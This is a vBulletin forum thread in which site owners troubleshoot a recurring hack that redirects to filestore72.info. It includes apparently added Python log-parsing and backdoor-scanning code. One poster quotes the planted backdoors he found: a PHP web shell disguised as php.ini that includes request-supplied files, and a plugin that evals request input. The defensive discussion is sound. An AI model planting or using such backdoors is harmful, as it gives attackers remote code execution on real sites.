Vbulletin 4.2.0 pl3 hacked redirect to filestore72.info


  • BirdOPrey5
    replied
    Yes, I would uninstall VBSEO

    VBSEO is down but luckily the uninstall instructions with the URL Rewrite rules so links don't break is still available in the "Way Back" machine - http://web.archive.org/web/201301221...all-vbseo-238/



  • RichieBoy67
    replied
    I have done the best I can to make it secure but my advice would be to remove that old version. What do you think Joe? I always value your opinions.

    Thanks



  • BirdOPrey5
    replied
    There is no patch I have ever seen.



  • RichieBoy67
    replied
    Hey guys, I am working on a client site with a similar issue and I believe it is tied to the use of Vbseo 3.6. He is using Vbulletin 4.2 but still has Vbseo 3.6 and seeing as Vbseo no longer exists he has no way to get the latest version. Is there a patch available to fix this without doing an upgrade?

    Thanks



  • PET
    replied
    up.

    I deleted that PHP.INI.

    I also found a new my.log file on the root.



  • PET
    replied
    Ok I'm digging deeper.

    I just found a file called my.log in the root of the forum. It contains 2 users' info ... like this:

    Code:
    Array
    (
        [userid] => 11582
        [usergroupid] => 25
        [membergroupids] =>
        [infractiongroupids] =>
        [username] => username here
        [password] => password here
        [salt] => salt code here
        [email] => email.address.here
    )

    Error log file is full of entries like this:

    Code:
    [Sun Nov 10 06:36:29 2013] [error] [client 178.151.216.90] (36)File name too long: access to /index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Guedgecrele";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff;+Result:+\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed+\xed\xe8\xea\xed\xe5\xe9\xec+"Myncalleleabs";+\xe2\xf5\xee\xe4+\xe2+\xe0\xea\xea\xe0\xf3\xed\xf2+\xed\xe5+\xf3\xe4\xe0\xeb\xf1\xff; failed, referer: http://forum.censored.de/index.php++++++++++++++++++++++++++++++++++++++++++++++++Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Guedgecrele%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;+Result:+%E8%F1%EF%EE%EB%FC%E7%EE%E2%E0%ED+%ED%E8%EA%ED%E5%E9%EC+%22Myncalleleabs%22;+%E2%F5%EE%E4+%E2+%E0%EA%EA%E0%F3%ED%F2+%ED%E5+%F3%E4%E0%EB%F1%FF;
    [Sun Nov 10 06:37:26 2013] [error] [client 74.91.17.226] (36)File name too long: access to /index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+"bamilesqshuzea3914";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1;+Result:+chosen+nickname+"bjnessdark9685";+ReCaptcha+decoded;+(JS);+registered+(registering+only+mode+is+ON);+TryAntiSFS=1; failed, referer: http://forum.censored/index.php+++++++++++++++++++++++++++++++++Result:+using+proxy+184.73.192.181:3128;+GET-timeouts+1;+chosen+nickname+%22bamilesqshuzea3914%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;+Result:+chosen+nickname+%22bjnessdark9685%22;+ReCaptcha+decoded;+%28JS%29;+registered+%28registering+only+mode+is+ON%29;+TryAntiSFS=1;

    I also have a php.ini file in my forum root that has this:

    Code:
    <?
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo ini_get("safe_mode");
    echo ini_get("open_basedir");
    include($_GET["ss"]);
    ?>

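To tally the bot traffic behind those "(36)File name too long" entries per client address, as an added example rather than anything from the thread: the sample lines are constructed with RFC 5737 documentation addresses and only mimic the shape of the entries quoted above.

```python
import re
from collections import Counter

# Shape of the Apache 2.2 error_log entries quoted in the thread: errno 36
# (ENAMETOOLONG) because the bot appends its own status report to the path.
ERROR_LINE = re.compile(
    r"^\[(?P<when>[^\]]+)\] \[error\] \[client (?P<ip>[0-9.]+)\] "
    r"\(36\)File name too long: access to (?P<path>\S+) failed"
)
# Markers the registration bot leaves in the URL it requests.
BOT_MARKERS = ("Result:", "chosen+nickname", "ReCaptcha+decoded", "registered+")

def parse_line(line):
    """Return (timestamp, ip, path) for a 'File name too long' entry, else None."""
    m = ERROR_LINE.match(line)
    if not m:
        return None
    return m.group("when"), m.group("ip"), m.group("path")

def is_registration_bot(path):
    """True when the path carries a long run of '+' plus one of the bot's markers."""
    return bool(re.search(r"\+{8,}", path)) and any(mk in path for mk in BOT_MARKERS)

def summarize(lines):
    """Count bot-looking requests per client IP across an error_log."""
    hits = Counter()
    for line in lines:
        parsed = parse_line(line)
        if parsed and is_registration_bot(parsed[2]):
            hits[parsed[1]] += 1
    return hits

# Constructed sample log (documentation addresses, invented nicknames).
SAMPLE_LOG = [
    '[Sun Nov 10 06:36:29 2013] [error] [client 192.0.2.10] (36)File name too long: '
    'access to /index.php++++++++++++Result:+chosen+nickname+"botuser1";+ReCaptcha+decoded;'
    '+registered+(registering+only+mode+is+ON); failed, referer: http://forum.example/index.php',
    '[Sun Nov 10 06:37:26 2013] [error] [client 192.0.2.10] (36)File name too long: '
    'access to /index.php++++++++++++Result:+chosen+nickname+"botuser2";+registered; failed, referer: -',
    '[Sun Nov 10 06:40:00 2013] [error] [client 198.51.100.7] (36)File name too long: '
    'access to /index.php++++++++++++Result:+using+proxy+203.0.113.5:3128;+GET-timeouts+1; failed, referer: -',
    # An ordinary error that must not be counted as bot activity.
    '[Sun Nov 10 06:41:13 2013] [error] [client 198.51.100.9] File does not exist: /var/www/forum/favicon.ico',
]

if __name__ == "__main__":
    for ip, count in summarize(SAMPLE_LOG).most_common():
        print(f"{ip}: {count} bot request(s)")
```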


  • Lynne
    replied
    Have you looked through your access_logs to see what is going on?



  • PET
    replied
    1. They are ok. No one who should not have access is getting access.
    2. We had one 3 months ago that we deleted; that one probably gained access through some PHP Root files I found and deleted.
    4. I went to each of them and disabled them one by one.

    Filestore still comes back after 1-2 days. Really no idea what to do.

    vBulletin is running 4.2.1 (yes I know there is a 4.2.2)
    All old vB files got deleted. All extra PHP files got deleted.
    Found some PHP Root files in Attachment folders; all got deleted.
    I protected the 777 folders.
    Checked the template

    So no rogue admins, no root php files.

    Filestore still comes back.



    Thanks



  • Mark.B
    replied
    Change your admin passwords.
    Check for any admins you don't recognise.
    Password protect your admincp folder using .htaccess
    Go through each plug in and delete any that you don't recognise.

    If you're still having problems after that, please start your own topic with full details of the problem.



  • PET
    replied
    Ok my problem persists. Any ideas?

    I don't use vBSEO. I have disabled plugins one by one. The filestore hack always comes back after 1-2 days.



  • PET
    replied
    Ok. I'm also posting here. Same problem. No vBSEO installed. Did everything from what's been suggested. The filestore problem still persists even after the upgrade.

    I'm looking into plugins and I see this:
    A Plugin Named: 123
    Product: vBulletin
    Hook Location: faq_complete

    This is the code:

    Code:
    eval(stripslashes($_REQUEST[ass]));

    No idea what this is, so I just deactivated it.


    Do you have any ideas on how to fix this? It keeps coming back.

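A static check for the two kinds of code quoted in this thread (the php.ini dropped in the forum root and the plugin named "123"), written here as an added example and not code from vBulletin or from any poster: it flags request input fed straight into eval()/include(), ini_restore() calls that drop safe_mode/open_basedir limits, and PHP tags inside files that should hold none. The indicator names are our own labels; the benign plugin sample is constructed. It can be run over the forum tree, or fed each row of the phpcode column of the plugin table, which is where the plugin code the datastore is refreshed from lives.

```python
import os
import re

# Indicator patterns modelled on the code quoted in this thread (plugin "123"
# and the php.ini dropped in the forum root); the names are our own labels.
INDICATORS = {
    "eval_of_request": re.compile(
        r"eval\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    "include_of_request": re.compile(
        r"(?:include|require)(?:_once)?\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    "ini_restore": re.compile(
        r"ini_restore\s*\(\s*['\"](?:safe_mode|open_basedir)['\"]"),
}
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|\s)")
# Files that should never contain PHP code: config, logs, attachment images.
NON_CODE_SUFFIXES = (".ini", ".log", ".txt", ".jpg", ".jpeg", ".png", ".gif")

def scan_source(label, code):
    """Return indicator hits for one piece of PHP source (a file or a plugin row)."""
    hits = [f"{label}: {name}" for name, rx in INDICATORS.items() if rx.search(code)]
    if label.lower().endswith(NON_CODE_SUFFIXES) and PHP_OPEN_TAG.search(code):
        hits.append(f"{label}: php_code_in_non_php_file")
    return hits

def scan_tree(root):
    """Scan every file under a forum root; unreadable files are skipped."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits.extend(scan_source(path, fh.read()))
            except OSError:
                continue
    return hits

# Samples: the two snippets quoted in the thread plus a constructed benign hook.
PHP_INI_SHELL = ('<?\necho ini_get("safe_mode");\ninclude($_GET["file"]);\n'
                 'ini_restore("safe_mode");\ninclude($_GET["ss"]);\n?>\n')
ROGUE_PLUGIN = 'eval(stripslashes($_REQUEST[ass]));'
BENIGN_PLUGIN = '$title = $vbulletin->options["bbtitle"];'  # constructed, harmless

if __name__ == "__main__":
    for label, code in (("php.ini", PHP_INI_SHELL), ("plugin:123", ROGUE_PLUGIN),
                        ("plugin:benign", BENIGN_PLUGIN)):
        print(label, "->", scan_source(label, code) or "clean")
```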


  • BirdOPrey5
    replied
    Look at the links in Post # 3, and update VBSEO.

    To clear the current infection just go to the Admin CP -> Plugins & Products -> Product Manager and DISABLE then Re-Enable any product listed. This will force a refresh of the datastore which is where the code usually is.



  • postcd
    replied
    I'm having the same issue



  • EliasAlucard
    replied
    Originally posted by Zachery
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.
    But do all third party addons ALWAYS have exploits? I'm trying to pinpoint the plugins we have in common here, if the exploit is actually in the plugin



  • Zachery
    replied
    Any third party addons can have exploits, we don't track those. And unless the addon developer gets a notification about them, they might not be fixed.

